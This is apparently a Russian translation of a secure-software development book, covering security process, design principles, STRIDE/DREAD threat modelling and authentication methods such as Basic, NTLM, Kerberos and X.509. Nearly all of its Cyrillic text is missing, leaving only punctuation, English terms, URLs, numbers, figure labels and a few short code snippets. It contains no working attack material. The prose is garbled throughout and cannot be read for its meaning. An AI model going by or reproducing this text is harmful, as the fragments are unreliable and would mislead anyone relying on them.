. , ,
( )
, ,
. , ,

. , World Wide Web
Wild Wild Web* ? , .
, , .

, 13 2001 , Web
,
(System Administration, Networking and Security Institute, SANS) http://
www.sans.org. SANS
SANS NewsBytes
:
,
.

,
, , .
.
, .
(defacement) Web
http://www.msnbc. com/news/600122.asp.
! ,
, .
, ,
. :
, , ,
.
,
. ,
, Web, Wild Wild West (, ). . .
, , ,
.
, ,
.
, ,
, .
, , ,
, .
, .
Web-
, ,
. ,
, . (honey
pot* ), .
,
,
Honeynet (project.honeynet.org).
, 90
Web http://www.windows2000test.com,
Windows 2000 .
. Web ,
. ,
.
, , . ,
, .

. ,

. , ,
(whitehats), ,
; .

, Microsoft.
, .
:
.
, , ,
.
,
(script kiddies).
, (scripts),
. . .
, ,
, ( exploit code,
exploit, sploit).
, Web- Windows 2000

, , , ,
? . Windows 2000
, . ( ,

.) (), IP,
Microsoft, IP
. , ,
. (port
scanning). 80
(Hypertext transfer protocol, HTTP).
HTTP HEAD, ,
Web. Internet Information Services 5
(IIS 5), .
Web, IP ,
Web, Windows 2000,
www.windows2000test.com.
http://www.slashdot.org,
.
, , ,
! .
. ,
, exploit ,
.
,
, .
. :
. ,
. ! ,
,
, .
,
.
, , ,
, , ,
, , .
, ,
!
, ,
.
, . , , ,
.
,
,
.
,
. ,

, .
, .

, , (trustworthy computing),
,
Microsoft , , . , ,
: , .
,
.
, . ,
, .

. ,
. (
.) ,
.
, , ,
, .
, ,
. ,
, (selfhealing).
.
,
.
!
, ,
, ,
.
, .
,
. , ,
. ? ,
. ,
.
, (
) . ,
,
. , ?

,
, . ,
.
, , ,
.

. ,
.
!
, .
, , ,
. ( ,
,
; .) ,

. , ,
,
.

, ,
: .
. ,
, ,
. , , ,
. , ,
, .
. 11, .

,
. ,
Microsoft Age of Empires 2, ,
,
. , ,
.
, ,
.
. 11.

( )
, ,
. , ,
.
, ?
, ,
,

, . ,
,
.
.
, ,
,
, .
,
.
.
, ,
. ,
, .

, ,
, . ,
, ,
. ,
!

,
.
,
:
;
, ;
, ;
, ;
;
;
,
, Authenticode;
Web;
,
;
PR,
;
(ISP);
,
, ,
;
.
,
. ,
, , ,
;
, , ,
.
,
, .
!

,
Microsoft (Microsoft Security Response Center) ,
, ,
100 000 .
,

(Computer Crime and
Intellectual Property Section, CCIPS) Web (http://
www.cybercrime.gov).
10
, , ,
.
, ,
.

.

,
. .
,
. .
,
. , , ,
, .
, :
;
;
(script) ,
;
(
, ?);
,
;
,
,
.
(regression bug)?
; , .
, .
, ,
, . ,

.
. ,
.
Perl, .
: ,
, . ,
, . .
TCP (Transmission Control
Protocol), Perl:
, ,
. ,
, .
11
5.
,
,
. :
(own),
?
(own)?

. , 0wn3d (owned
). , !
. , 3
e (,
E), 0 O . ,
, (rooted)
(root).
(superuser), Unix root.
Administrator () SYSTEM Microsoft Win
dows NT/2000/XP .
, .
; , , .
, ,

, , , ,
. ,
.
! ,
. .
,
, .

, ,

, . , ,
,
.
,
, ,
12

. ,

.

,

.
, ,
. , ,
(Jim Allchin), Windows Microsoft.
, Windows:
, , Windows XP
. ,
,

. , Microsoft

.

,
.
Windows XP
.
, .

, ,
,
.
,
,
. , Windows
XP ,
.
.
: .
, . ,
, .
, Windows XP
13
, . :
,
.
Microsoft 2002 ,

(Trustworthy Computing),

.
,
. Web
news.com.com/20091001817210.html.

, , ,
.
, .
:
;

;
, ;

. :
, ,
;

, .
, .

: NTBugTraq BugTraq. Windows NT,
. NTBugTraq
(Russ Cooper), http://
www.ntbugtraq.com. BugTraq, ,
,
SecurityFocus, Symantec Corporation.
http://www.securityfocus.com,
20 .
NTBugTraq BugTraq
.
SecurityFocus (http://
www.securityfocus.com), VulnDev, PenTest SecProg.
14

.
:
, . , ,
,
.
Microsoft , ,
, :
. , ;
. ,
, ,
, , , ,
, ,
;
,
;
( )
;
, .
;
;
.
, . , ,
, .

,
, .
. ,
,
.
, ,
.
, ,
. ,
.
, ,
: , .
,
.
.
.
.
15
, , . (,
, : , ,
.)
, ,
. ,
.
2000 ,
. ,
, .
, ,

. , (
) .
, .
, .

,
. ,
, , ,
, ,
: ,
. :
. : ,

. , Windows (Secure Win
dows Initiative) Microsoft :
, .
;
(white paper),
.

;
: ,
, ,
.
.
,
.
;

. Web ,
, ,
, .
16
,
;

, ,
.

. ,
strcpy
, ,
.

.

: .
, ,
, ,
.
.

.

, ,
.
, , , .
, , , ,
.
, ,
, . ,
24 , 7
. ,
, ,
. ,
.
,
.
.
17
1:
,

, :
5 * , , .
, ,
, .
,
, , .
, .
:
, .
,
, .
2:
,

, , .
, ,
? ?
.

. , IIS 5 ,
(escape character) URL,

UTF8
. , ,
.
Web http://www.wiretrip.net/rfp/p/doc.asp/i2/
d57.htm.

, .
, ,
, .
3: ,

.
. ,
. , , ,
.
. . .
18
, ,
, . ,

, .
4:
,

, .
,
(, ,
, ) .

.
.
, , .
,
, .
, ,
. , ,
,
. ,
, !
(George Mallory) (18861924), :
? : , .
,
, ,
.
, , ,
. (
)
. ,
. ,
.
, ,
.
, : ,
, .
, , ,
.
,

.

,
, , ,

.
,
.
, :
;
,
;
;
20

;

.

.
, , ,
; ,
, , .
, , ,
, .
,
.
, . ,
, (usability)
,

. , ,
!
: ,

? ,
? : ,
.
,
. ,
, ,
. ,
,
( ). ,
, A B,
, , A 15% B.
,
, , ,
. . , ,
,
,
. :
. 3 19.
: ,
, .
, ,
, , ,
.
:
21

, .
, .

(
) .

.
. 21 ,

.
, (waterfall approach),
,
. .
. 21.
, . ,

.

. ,

. .
22

, ; ,
.
2002 ., Microsoft
Windows (Windows Security Push).
8500 . , ,
! , ,
, Windows (
70), , !
, 56 .
, ,
. ( Microsoft
.)
, . ,
, !
? .

. , , :
, , .
. ,
, ,
. , , ,
. :
, .
, , . 2002 .
Windows Security Push
(Network and
Distributed System Security Symposium, NDSS) ,
.
, .
Secure Windows Initiative,

. ,
RSA (RivestShamirAdleman), .
,
P Q..., , ,
RSA, . : ,
RSA ( , ,
, , ),
. , ,
; .
, , , : RSA
, , ,
, , .
RSA

23
. ,
, , +
. , ,
, :
.
,
,
.
, , .
, , , ,
. , .
: ,
,
. , ,
,
?
: ,
.
! : =
.
,

, RSA .
: RSA ,
. ,
;
,
. ,

, RSA .
!
Windows Security Push. ,
,
. , , Kerberos, DES (Data Encryption
Standard) RSA, ,
, C++! :
, , ,
, .
8500 .
: , ,
,
. : , , ,
. (
, ) .
( Microsoft).
24
. ,
!

,
. ,
:
,
,
.
,
, .
.
! ,
. , , ,
, ,
; ,
, . ,
,
.

,
, ! ?
,
.
, , .
, .
,
.
,
, ,
. .
:
IIS 6
, . , , ,
. ,
, ? ;
,
. ,
, . !
25

, ,
,
.
. ,
: ,

. ,
.

, .
, (
Windows, ,
, HTTP, XML .) ,
(. 22).
. 22.

, :
, ,
,
.
,
, ,
.
26
! . ,
,
,
.
!
,

, ,
. ! ,
, , .
.
, .
,
, :
: ,
.
: .
: ?
: 10 000 ,
.
:
?
?
: ? 10 000 10 000 !

, , ,
,
. ,
.
,
.
!
2001 . ,
. :
.
1000 ,
C .
10 , 16.
,
, , ,
. ,
27
. , 45, 41 .
, 54 . ,
55 , . . , , 57,
!
,
, ,
?
!
, .

, ,
, , .
,
Microsoft. ,
. ,
, , , ,
,
. .
!
;
.

. ,
, ,
10 , ,
, 10
..
.
, :
,
. :
. , .

, .
;
. ,
,
.
,
. ,
28
,
.

, . ,
, .

5.
:
,
.

.
, GPS.
:
;
;
;
, ,
;
( ) ?
? ?
, , ,
.
. ,
,
.
,
, .
.
,
, ,
.
,
. ,
,
, .
, !

.
.
, ,
,
29
. , ?
, ,
. , ,
. Microsoft
,
.
(. 23) .
,
, ,
.
!
?
-
Fortune 1000
?

.
,

, Web-
?
! - ,
Web-
. ,
-
.
?

,
100 . -
(script kiddies), "" Web-
(DOS-); ;
,
,
.
, .
?
,

. ,
.
,
.
. 23.
30

,
. :
,
? , ,
.
.
?
?
?
?
: ? ,
? ?
?
?

?

?
?

ISO 17799 Information Technology Code of practice for information security mana
gement (
) ,
, ,
, 10.1.1 10.1 Security
requirements of systems ( ):

,
.
ISO 17799 ,
,
. www.iso.ch.
, ,
ISO 17799, ,
9.6 Application access control (
), 10.2 Security in application systems (
) 10.3 Crypto
graphic controls ( ).
31

, . ,
.
, ,
.
. ,
,
.
www.ietf.org;
RFC, IETF ,
, .
:
. :
Microsoft Clip Art Gallery,
(www.microsoft.com/technet/security/bulletin/MS00015.asp);
ufsrestore, Solaris,
root
(online.securityfocus.com/advisories/3621);
sort UNIX, Apple OS X,
DOS (www.kb.cert.org/vuls/id/
417216).
? ,
,
.
, .
,
.
:
(The Net),
(Sneakers) (Hackers)!
,
:
0: ;
1: ;
2: ;
3: ;
4: ;
5: .
,
? ,
,
32
. ,
.
, , 3,
, 1 2.
, , 3,
.
: ,
0 , ,
.
,
, 3.
, .
: ,
, ,
, ,
.
, , ,
:

,
;
, ,
;

. ;

, .
!
(
, ),
. , ,
.
,
,
,
, .
, ,
.
, , ,
, .
01.09.2002
08.09.2002
1:
22.10.2002
30.10.2002
,

1 ,
Secure Windows
18.11.2002

2:
15.12.2002
10.01.2003
, ,
1:
06.11.2002
27.11.2002

2:
02.02.2003
24.02.2003
2 ,
Secure Windows
28.02.2003
07.03.2003
:
(Release)
03.04.2003
25.05.2003
33

3:
01.06.2003
4
01.07.2003
3 ,
Secure Windows
14.08.2003
:
(Release)
30.08.2003
21.09.2003

(Release
Candidate)
30.09.2003
30.10.2003
, 4 ,
Secure Windows
!
,
.

.
, , ,
. ,
. , ,
:
, .
34
,
.
.

, ,
, ,
, , .
, ,
.
, / .

, .
,
, ,
, .
,
, , .

,
, .
DOS: ,
.
,
4, ,

. ,
, . :
. .

,
.
, .
, ,
,
.
. ,
, . ,

. , ,
, .
35

, ,
. ,
, .
. , ,
, .
, ,
, ,
,
(), , ,
, , ,
.
, ,
(, ,
, ).
, ,
,
. , ,
. , ,
, .
Microsoft
, ,
A1 Orange Book. (

, A1 .
http://www.dynamoo.com/orange.) ,
, ,
,
,
.
, .
, , 10
50 000 ,
, ,

? ,
; ,
.
( ),
,
. ,
!
,
. ,
36
, , ,
, , .
.
, , ,
. ,
. : ,
, , , 3,
.
, .
, ,
.
! , ,
, .
: ,
4.

,
, ,
.

, . Microsoft
.
.
.
: .
?

:
(checkin) .
, .
.

,

. , ,
, :
. ,
37
, , ,
, . (Hawthorn
effect) , *.
,
, ,
.
. ,
HTML XML
, .
(code diffs),
. ,
Perl, Windows.

.
windiff.exe** , , .
,
. :
.
, , ,
,
, .

: ,
, . . ,
, ,
, .
,
,
.

, , 3.
, ,
.
.
(George Elton
Mayo, 18801949) ,
.
. ,
, . . .
**
. . .
38

, ,
. Microsoft,
,
,
. ,
, ,
.
, , .
,
, .

2001 . Microsoft
security push. :

;
,
;
;
.
.
security push ( Windows 8 ),
, .

. , ,
, ,
. , security push
, ,
,
. ( , ,
security push ,
, , ,
!)
,
, :
,
. , ,
, , ,
, , ,
. ,

39
,
. 4;
.
; ;
,
.
;
,
,
. :
, .
,
( )! , ;
,
. . !

, ,
, . :
, 5 ,
, 3 ,
.
,
. , ,
.
:
.

, , .
, ,
.
4 STRIDE,
, , , , DS.
!
, ,
, .
,
? ,
, .
. , ,
, , , !
40
, .
,
, ,
, .

. ! ,
.
,
; ,
, .
, ,
. ,
,
19.

, , , ,
. ?
, ? ,
: , ?
,
, ,
,
. , ,
; .
X, ,
. ,

, . ,
, ,
.
, , readme,
, . , ,
readme .
,
readme
.
! , ,
!
41

, .
.
,
, ,
. ,
.
, , ,
.
, , ,
.
, , ,

. :
Acknowledgment Policy for Microsoft Security (
Microsoft) (www.micro
soft.com/technet/security/bulletin/policy.asp), RFPolicy (
) (www.wiretrip.net/rfp/policy.html) Responsible Vulnerability
Disclosure Process ( ) (Christey)
(Wysopal) (http://www.ietf.org).
,
, Common Methodology for Information Technology
Security Evaluation (
) (www.commoncriteria.org/docs/ALC_FLR/alc_flr.html).
, .

. , . ,
, .
.
? ! ,
, .
: ?
! ,
.
.
, ,
. , ,
.
42
, ,
. .

.
.
,
,
, .
!
, !
.
3
,

.
,
. ,
,
.
, :
,
. .
SD3: ,

Windows (Secure Windows Initiative),
, :
,
( : secure by design, by
default and in deployment SD3). ,
.
44

,
. ,
.
, .
, ,
,
, ,
, .
(
2).
,
. 4,
, ,
.

. , .
, .
,
. : ,
. , , .
.
,
.

. (
). ,
, ,
,
.
. ,
, .
,
. ,
, ,
, , ,
,
.
(code rot).
(penetration analysis).
,
. ,

.

45

.
(hackfests),
.
,
(denial of service attack, DS
)

.

,
.
.
:
, ,
.
.
,
, Administrators () Domain
Administrators ( ), .
,
7, .
.
( 6).

, .
,
,
.
, .
.
, ,
,
. ,
(patch) .

. ,
, !
,
.
, .
: ,
( 24) !
46

SD 3. :
. ,
, ; ,
, .
, , ,

,
. , ? :
;
, ;
;
;
;
, ;
;
;
,
;
, ,
;
,
( , ,
, );
;
.
, ,
, ,
.

, ,
,
. .
.
.
(Norman Cousins) (19151990),

.
(George Santayana) (18631952),

47
.
(Archibald McLeish)
(18921982),

,
. .
?
?
?
?
?
, . ,
,
, ,
.
.
Microsoft ,
,
Microsoft (Microsoft Security Response Center) www.microsoft.com/security.
,
, .
:
;
;
;
;
;
;
;
, ,
;
, , ,
(code diffs)* .
, ,

.
: ,
.
.
, .
. . .
48

, ,
( , ).
,
: ? ,
, .

. 100
.

, ,
, .
, ,
.
.
, .
,
.

, ,
. 20 .
. ,
,
. ,
,
!
,

,
,
. ,
.
19
, , :
(TCP UDP);
(named pipes);
(RPC endpoints);
;
, ;
, ;
ISAPI;
Web;
49
;
,
(Access Control List, ACL).
,
,
. , ,

SYSTEM, !
Microsoft
, :
.

, ,
.
,
.
, , ,
. , ,
, .
.
, 80/20: 20% ,
80% .
20% , 80% ,
. (
. , , :
DWORD, 28 ,
!). , ,
.
, :
, .

: ,
, , ,
.
.
.
,
.
,
. 20 ,
, : ,
, .
50
? .
, .
, :
, ,
,
? :
, ,
?
: , , !
. , : !
, ,
?
, !
,
, : .
, ,
, .
! ,
,
.
. ,
,
.

: ,
,
. . ,
, ,
.
? ,
, XVI ,
. ,
: ,
. .
, .
,
, . * .

.
,
, : , .
. .
51
.
, ?
, ,
:
;
,
. , .
,
. ,
. ,

, ;
;
,
;
,
( ,
);
:
;
;
.
,
,
. .
,
. :
.
, . ,
,
. , , .
, ,
?
(single point of failure),
.
! ,

. !

,
, , .
,
52
, , , , ,
,
. .
,

, , .
,
.

.
, :
? .
, .
, ,
,
. ,
? ( , , ,
,
.)
:

,
, runas,
Run as different user
( ) ( Windows 2000) Run with
different credentials ( ) ( Windows
XP).
.
. ,
.
!
,
, .
, ,
.
,
. , ,
, , ,
. ,
, .
, .
.
, . ,
,
53
, , .
.
,
, ,
.
7 ,

.

, ,
, . ,
.

:
, ,
,
.
.
2002 . 2.3.1 3.3 OpenSSH,
Apple Mac OS X, FreeBSD OpenBSD,
.
, UsePrivilegeSeparation
ssbd_config. Web www.open
ssh.com/txt/preauth.adv.
Microsoft IIS 6,
Windows .NET Server. IIS 5, Web
.
HTTP (w3wp.exe),
(Network Service),
(Local System). inietinfo.exe,
,
HTTP, .
Web Apache.
httpd root;
httpd,
nobody.

. , ,
, ,
, ,
.
54
.
:
,
. ,
, 1
2. , !

.
,
.
,
,
.
: SMB TCP/IP
Microsoft.
SMB (Server Message Block)
Microsoft LAN
Manager, 80. , SMB
, , Win
dows NT 4 Service Pack 3 Windows 98.
: (man
inthemiddle) ,
, .
,
,
. SMB ,
, , .
SMB
.
SMB ,

. :

.
:
SMB.

TCP/IP. IPSec (Internet Protocol Security)
TCP/IP ,
( ). TCP/IP ,
.
55
,

:
. ,
, ,
, .
, .
, .
.
. 15 :
DNS, ,
. , ,
.
,
, ,
Web .
,
. ,
.
! , , , ,

.
.
, !

, .
, (bugs).
, .
. , ? ,
Web? ?
, , .
: ,
, , .
: ,
. .

, , ?
: .
,
56
.

( ).
, ,
,
.
,
. ,
, ,
, Windows.
,
.
DWORD dwRet = IsAccessAllowed(...);

if (dwRet == ERROR_ACCESS_DENIED) {
// .
// .
} else {
// .
// .
}
, ,
IsAccessAllowed? ,
? ,
ERROR_NOT_ENOUGH_MEMORY.
:
DWORD dwRet = IsAccessAllowed(...);

if (dwRet == NO_ERROR) {
// .
// .
} else {
// .
// .
}
IsAccessAllowed
.
. ,
, ,
. , ,
(
). ,
, ,
.
10.

.
,
57
, .
, ,
.
(Jerome Saltzer)
(Michael Schroeder) The Protec
tion of Information in Computer Systems (
) (web.mit.edu/Saltzer/www/publications/protection).
:
, , .
,
,

:
!=
Secure Windows Initiative.
,
. ,
,
. SSL (Secure Socket Layer)
TLS (Transport Layer Security),
. ( ,
,
).
,
, ,
.
. ( ,
, ).
,
.

, , ,
.
, ,
.
.
,
. ,
.
58

, 2.0
Lotus 123 1985 .
80 90;
.
:
. .
, , .
,
, (
), ( ).
Web, URL
(crosssite scripting), HTML
JavaScript. ,
, .
,

. Microsoft
Office XP.
.

,

. , :
. , : , ,
, , , . . , ,
. ,
.
,

.
: , ,
, , .
,
. , ,
, ! ,
.
!
,
(patched) . :
59
, .
,
(40104 ..)
, ,
. , ProcessData,
. ,
. ProcessData
, ,
.
,
, .
, .
, , .
.
, ,
. . , ,
,
(
).
.
,
!
! , ,
. .
, ,
.

(threat model), .
,
, ,
.
.
, .
, , ,

, , .
Windows Security Push 2002 ,
,
, ,
,

, (
9), . ,
Windows Security Push ( Microsoft)
, , ,
.
61

, , ,
, ,
, .
,
, .
, !
.
. .
, , ,
!
:
, , !
. ,
,
,
.
. ,
.
. ,
,
.
! ,
, ,
!
,
.
, ,
.

. , ,
.
,
.
, ,
A, B, , A
. ,
A. , , ,
, ,
.
:
.
62

19.
,
.
, .
:
.
:
1. ;
2. ;
3. , ;
4. ;
5. ;
6. ;
7. .
(. 41)
: .
, ,

.

. 41.

.
.
.
, ,
. ,
63
, ,
.
,
, ,
, . ,
. ,
,
. ,
: ,
. ,

, .
,
, . (
,
, !)
,
, ,

, .
.

, Microsoft,
.
,

.
!
. ,
. ,
, !

,
, , .
,
.
: ,
, ,
. , ,
.

, . ,
Microsoft, 2001 ., ,
64
.
, ,
, .
2002 ., Microsoft @stake (http://www.atstake.com),
,
, Microsoft. ,
@stake,
, .
Microsoft SQL Server
, ,
. , SQL Server
. SQL Server ,

(data flow diagrams, DFD). ,
, DFD,
.
DFD,
. ,
,
.

, DFD
. ,
, DFD
. UML (Unified Modeling Language),
(activity diagram),
DFD. UML
,
, DFD. , .
DFD
UML.
.
DFD :
, , ,
. DFD
.
DFD (. 42).

,
. DFD
.
, ,

. :
65
.
: .

0, 1, 2 . . (. 43).
,
, ..

. 42.
DFD
DFD,
Web .
DFD Data Flow Diagram

Microsoft Visio Professional 2002.
. 44
.
DFD
:
.
, , ,
;
, .
, Web ,
;
, . Web
, , ,
;
66
. 43. DFD

DFD
.
, (, ,
. .) ( );
.
. 44
. . 45
1 .

3.0
67

;
0.0
1.0
2.0
Web-
4.0
. 44.
DFD
DFD, :

;
;
;

;

(: ,
, );
(
: , , );
(:
, );
68
2.0
14.0
12.0

6.0

9.0
5.0
11.0
1.0
7.0
Web-
13.0

8.0
Web-
3.0
Web-
. 45.
4.0
DFD 1
(:
, , ).
, ,
. ,
, . 8 DFD,
,
. ,
,
, DFD!
69
,
DFD 1.
!
, .
, ,
.
. 46

(, , ).
Web
Web-
Web-
Web-

Web-
Web-
. 46.
70
. 41.
4-1.

.
,
5
.

: Web Web.
:
,
. :
,

Web
Web, Web
Web
HTML

Web
,

,

Web
,
Web, Web
Web
HTTP
Web
Web
: WWW
,
.
Web
Web

Web. Web

,
.
,
4-1.
71
()
.
,

,

. , ,
,
.
(threat target). , ,
, . ,

.
: STRIDE
,
:

, ;
;
;

?
.
, STRIDE
.
(Spoofing identity)

.
(
) .
,
HTTP: (Basic authentication)
(Digest authentication). RFC 2617. ,
HTTP
(Blake), (Fletcher)
72
,
.
DNS (DNS spoofing)
DNS (DNS cache poisoning). :
Apple.
DNS, Web news.com.com/
21001001942265.html, DNS.
(Tampering with data)
. :
( ),
, (
, ).
, ACL [, Every
one: Full Control (: )].
(Repudiation)
( ), ,
. , , ,

, .
(nonrepudiation)
. ,
.
,
. ,
.
(Information disclosure)
, ,
, ,

. , ,
:
, .
(Denial of service)
,
Web .
DoS
.
(distributed denial of service,
DDoS), Trinoo Stacheldraht. Web
staff.washington.edu/dittrich/misc/ddos/.
DoS ,
, .
:
(Cheryl) Web,
(Lynn) ,
73
. Web
,
, .
(Elevation of privilege)
,
.
,

. . :
,
,
. ,
.

, . STRIDE
.
. ,
.
, .
STRIDE DREAD (
) , Microsoft
, (Lohen Kohnelder), (Praerit
Garg), (Jason Garms) .
, .
,
. , ,
:
root ,
.
, ,
. , SMTP,
,

.
!
, , .
(threat trees)
STRIDE.
,
OCTAVE (Opera
tionally Critical Threat, Asset, and Vulnerability Evaluation) (http://www.cer
t.org/octave).
74

(fault trees). ,
.
( ),
.
. (Edward Amoroso)
Fundamentals of Computer Security Technology (
) . .
, , ,
,
, ,
.
, .
, ( )

(asset).
(threat target).
(
),
. :
, .
.
?
!
, .
, .
.
, . ,
.
, , .
, ,
, .
,
.
, .
, ,
.
.
: ,
,
.

75
.
, , .
,
.

. DFD .
, Web
(, ) (. 47).

1.0
5.0
. 47. DFD 1,
Web
, ()
,
,
.
. .
:
, , (sniffer)
, (promiscuous mode),
,
Web* . ,
, .
. 48 , ,

.
,
.
, ,
. . .
76

. ,
( ),
. ,
, , (promis
cuous mode). , ,

.
1

(I)
Component
1.1
HTTP-

1.2.1

1.2
1.2.2
1.2.3
1.2.2.1
1.2.2.1
1.2.2.2

1.2.3.1

. 48.

,
, .
[ (I)],
. :
,
. (1.0)
(5.0).
77
!
.
: , HTTP
(1.1),
, (1.2.1) ,
(1.2.2) (1.2.3).
( HTTP),
1.2.1 1.2.2. ,
. :
:

( 1.2.2.1 1.2.2.2),
(1.2.2.3).
(
).
, .
,
.

. ,
. 48.
1.0
1.1 HTTP! ()
1.2
1.2.1
1.2.2 ,
1.2.2.1 ()
1.2.2.2
1.2.2.3
1.2.3
1.2.3.1
,

. ,
, .
, ,
, (. 49).
,
. .
, .

:
. . 411 , 3.2 ,
3.2.1 3.2.2 .
78
, ()
. .

(I)
(S) (E)
1.1
SSL/TLS
1.2

1.3

1.3.1

,

1.2
. 49.

,
(. 42).
4-2. ,

,
.
,
, . ,

(1.05.0)
(14.0)
STRIDE.
STRIDE
4-2.
79
()
.
,
( )
.
, ,
. ,
.
.
.

. : ,
, ,

( )
,
. ,

. ,
,
.

!
, , .

,
, , .
,
.
( RiskCO)
( ) ,
. 1 10:
<RiskCO> = < > * < >

, . ,
100 (10)
(10).
DREAD
,
Microsoft, DREAD ( RiskDREAD)
.
(Damage potential)
. (10)

80
. 10.
.
, .
(Reproducibility)
. ( 10),
, ,
, .

. .
(Exploitability) ,
. ,
, (10).
100 000 000 ,
1. : , [ ,
(script kiddies)],
10 .
. ,
,
10 . ,
, .
, (Affected users)
, .
: 100%
10, 10% 1 . ,
. ,
.
: , ,
, , .
, .
, ,
. 100 .
.
(Discoverability)
. , ,
, 10 ,
.
DREAD (
5).
, .
, :
1:

8
10
: 100%
81
10
: ,
10
: ,

RiskDREAD: (8 + 10 + 7 + 10 + 10) / 5 = 9
9 10 ,
, ,
.
! , ,

. : ,
, ! !
, ,
, .
, (Christopher W. Klaus)
Internet Security Systems, ,
. ,
:
: ?
, ? ,
;
? ,
? ?
;
? , ,
, ,
.

.
: , ,
STRIDE DREAD
, .
, STRIDE
, ,
, , ,
, , DREAD.
STRIDE .
:
;
;
,
;
;
82
;
, ?
,

.
DFD
. ,
, .
:
, .
.
Windows Security Push ,
,
. ,
,
.
, , ,
. ,
,
. , , .
,
, , , .
, ,
.
? , , 30
?
? .
, ?
? ,
?
? , ?
? , ?
, ,
. , ,
5 , , , ,
5 ,
15 , 10
.
. , ,
.
,
. ,
.
83
, DFD
(. 43).
4-3. DFD-
STRIDE
.

( ,
), ( ,
) .

.

(reverse engineering)
.

.
,
.

,
, .
,
.
,
.
, ,
.
.
,
,
,
.
(. 44 49) ,
. . 48 . 410 414 (
84
) ,
. 44 49.
4-4.
(5.0 1.0)
: 9
: 10
: 7
: 10
: 10
: 9
,
.
, ,
, .
,
, ,
, .
, Why your switched network isnt
secure ( )
http://www.sans.org
4-5.
Web-
Web (7.0) Web (8.0)
: 7
: 7
: 7
: 10
: 10
: 8,2
4-6.

.
Web
. (
)
: 6
4-6.
85
()

: 6
: 7
: 9
: 10
: 7,6
DoS,
Web
, .
,
.
3.3:
(Cartesian join).

, SQL. ,
,
,
650 000 , 113 000, 75 100,
5 165 095 000 000 000
.
3.4:
.
,
(11.0), ,
,
.
, ,
(, DoS),

4-7.
(12.0)
: 10
: 5
: 5
: 10
: 10
: 8
4.3

(2.0)
,
(12.0). DFD (. 45),

86
4-8.
(5.0)
: 10
: 2
: 2
: 1
: 10
: 5

Web, .
, ,
Web,
Local System.
,

Web.
,
. ,
,

4-9.
(5.0)
: 10
: 2
: 2
: 8
: 10
: 6,4

: (
)
[ DNS (flood) ]
87
2

Web-
2.1
2.2
2.1.2
2.2.1
e
-
. 410.
2.3
Web-
,

2.4
Web
2.4.1

2
3

3.1
3.2
3.3
er

3.4

3.2.1

3.2.2

. 411.
88
4.1
,

4.2
4.3

4.2.1
4.2.2
4.3.1
4.3.2

(. 1)
SSL
. 412.
4
5

Web-
5.1
,

. 413.
5.2
5.2.1

Web-
5.2.2
,

Web-
89
6

Web-
6.1

,
Web-()
6.2.1
DNS
6.2

6.2.2

IP-
6.2.3.1

. 414.
6.2.3

6.2.3.2

6.2.4
6.2.4.1
er

,
?
(
, ). . 410. ,
2.3 , , ,

.
, ?
, : ,
,
.

(zeroday attack) , ,
,
, exploit.
90
DREAD
.
! .
,
, ,
.

,
, .
1.
, DFD. DFD
,
, , .
2. STRIDE ,
. ;
.
3.
.
4.
DREAD .
5. .
,
.

:
;
;
;
, .
1:
,
,
.
,
. ,
.
: .
91
2:

, . Microsoft Internet Infor
mation Services (IIS) :
(basic authentication),
,
, ,
SSL/TLS.
1, :
, ,

. (
24.)
, , . ,
,
.
: ,
,
. ,
,
.

, ,
!
. ,
.
3:

,
. . ,
: .
, ,
. ,
:
, . ,
!
4:
: .
,
, ,
. ,
.
92

, ,
. .
, .
. , ,
. ,
, Kerberos
. . 410 ,
, STRIDE.
4-10. ( )

MAC

,

, . 410,
, .
, ,
93
(
).
,
.
, .
, ,
. ,
,
, .
, ,
(principal), ,
, , .
, .
(credentials),
, ,
( ).
Windows .
,
. Windows
:
;
;
;
Microsoft Passport;
Windows;
NTLM (NT LAN Manager);
Kerberos v5;
X.509;
IPSec (Internet Protocol Security);
RADIUS.
. ,
(Basic Authentication) , ,
Kerberos.
. , ,
, .
, ,
. . 411 ,
.
94
4-11.
Microsoft Passport
NTLM
Kerberos
X.509
IPSec
()
()
RADIUS

,
HTTP 1.0 (. RFC 2617 http://www.ietf.org/
rfc/rfc/rfc2617.txt). , Web Web
,
. Base64!
, :
,
,
SSL/TLS IPSec.

, , RFC 2617,
: ,
. , ,
HTTP, : LDAP,
IMAP (Internet Message Access Protocol), POP3 (Post Office
Protocol 3) SMTP (Simple Mail Transfer Protocol).

,
. , Microsoft ASP.NET
IHttpModule FormsAuthenticationModule.
.
Web,
. Web Web
( SSL/TLS),
. ,
, ASP.NET, XML.
ASP,
:
95
<%
Dim strUsername, strPwd As String
strUsername = Request.Form("Username")
strPwd = Request.Form("Pwd")
If IsValidCredentials(strUserName, strPwd) Then
' ! !
' ,
Else
' ! /
Response.Redirect "401.html"
End If
%>
.
.
Microsoft Passport
ssport ,
Microsoft. (
Microsoft Hotmail Microsoft Instant Messenger)
( 1800flowers.com, Victorias Secret, Wxpedia.com,
Costco Online, OfiiceMax.com, Office Depot 800.com).
, Passport, Web,
Passport, . Web
Passport
Passport Software Development Kit (SDK) c http://www.passport.com.
Passport ASP.NET PassportAuthen
ticationModule. Microsoft Windows .NET Server
LogonUser. , Internet Information Services 6
(IIS 6) Passport
, : ,
, Windows X.509.
Windows
Windows : NTLM
Kerberos. SSL/TLS,
. Windows
SSPI (Security Support Provider Interface).
SSP (Security Support Provider). Windows
SSP: NTLM, Kerberos, Schannel Negotiate. NTLM
, Kerberos 5, Schannel
SSL/TLS.
Negotiate ,
, , Windows 2000,
NTLM Kerberos.
, SSPI,
(Jeffrey Richter) (Jason Clark) Programming ServerSide Appli
cations for Microsoft Windows 2000 (Microsoft Press, 2000) ( ., . .
96
Microsoft Windows 2000.

. .:; .: , 2001).
NTLM-
NTLM Windows,
Windows CE. NTLM
Windows, , IIS,
Microsoft SQL Server Microsoft Exchange. NTLM. 2,
Windows NT SP 4,
1: (maninthemiddle).
, NTLM :
, .
Kerberos v5
Kerberos v5
(Massachusetts Institute of Technology, MIT) RFC 1510 (http://
www.ietf.org/rfc/rfc1510.txt). Windows 2000 Kerberos
Active Directory.
Kerberos ,
: . Kerberos ,
NTLM, .
Kerberos
(service principal
names, SPN) : Designing
Secure Webbased Applications for Microsoft Windows 2000 (Microsoft Press, 2000)
(. , . , . Web
Microsoft Windows 2000. . : ; .: , 2001).
X.509
X.509 SSL/TLS.
Web SSL/TLS HTTPS, HTTP,
SSL/TLS
. , ,
, .
, , ,
.
, SSL/TLS
. ,
SSL/TLS
. ,
X.509,
, .

,
. Windows 2000/XP
. Windows
.
97
X.509, ,
Designing Secure Webbased Applications for
Microsoft Windows 2000 (Microsoft Press, 2000) (. , . , .
Web Microsoft Windows 2000.
. : ; .: , 2001).
,
, (, Web,
